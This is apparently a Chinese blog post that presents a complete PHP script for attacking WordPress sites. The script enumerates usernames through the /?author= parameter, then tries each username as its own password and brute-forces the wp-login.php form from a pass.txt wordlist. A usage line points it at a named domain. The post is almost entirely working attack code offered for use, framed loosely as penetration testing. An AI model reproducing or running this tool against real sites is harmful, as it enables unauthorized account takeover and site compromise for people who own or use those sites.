我认为,在某些情况下渗透测试者遇到的最新版本和没有安装插件的wordpress,我们可以利用一些暴力的方法来进行渗透。
事实上我们通过列举的用户名:/?author=,然后试着猜相同的用户名和密码的帐户。如果我们不成功,则可以通过目录下的pass.txt继续暴力破解来得到结果,这个脚本默认列举了10个用户,你自行修改。
Usage:
php wordpress.php http://www.chncto.com
01 <?php
02
03 set_time_limit(0);
04 $domain = $argv[1];
05
06 //enumerate username
07 for ($i=1; $i <= 10; $i++) {
08
09 $url = $domain."/?author=".$i;
10 $response = httprequest($url,0);
11 if ($response == 404) {
12 continue;
13 }
14 $pattern = "/author\/(.*)\/feed/";
15 preg_match($pattern, $response, $name);
16 $namearray[] = $name[1];
17 }
18
19 echo "totally got".count($namearray)."users\n";
20
21 echo "attempting same username&password:\n";
22
23 $crackname = crackpassword($namearray,"same");
24
25 $passwords = file("pass.txt");
26
27 echo "attempting weak password:\n";
28
29 if ($crackname) {
30 $namearray = array_diff($namearray,$crackname);
31 }
32
33 crackpassword($namearray,$passwords);
34
35 function crackpassword($namearray,$passwords){
36 global $domain;
37 $crackname = "";
38 foreach ($namearray as $name) {
39 $url = $domain."/wp-login.php";
40 if ($passwords == "same") {
41 $post = "log=".urlencode($name)."&pwd=".urlencode($name)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
42 $pos = strpos(httprequest($url,$post),'div id="login_error"');
43 if ($pos === false) {
44 echo "$name $name"."\n";
45 $crackname[] = $name;
46 }
47 }else{
48 foreach ($passwords as $pass) {
49 $post = "log=".urlencode($name)."&pwd=".urlencode($pass)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
50 $pos = strpos(httprequest($url,$post),'div id="login_error"');
51 if ($pos === false) {
52 echo "$name $pass"."\n";
53 }
54 }
55 }
56 }
57 return $crackname;
58 }
59
60 function httprequest($url,$post){
61 $ch = curl_init();
62 curl_setopt($ch, CURLOPT_URL, "$url");
63 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
64 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
65 curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
66
67 if($post){
68 curl_setopt($ch, CURLOPT_POST, 1);
69 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
70 }
71
72 $output = curl_exec($ch);
73 $httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
74 curl_close($ch);
75
76 if ($httpcode == 404) {
77 return 404;
78 }else{
79 return $output;
80 }
81 }
82 ?> 全文完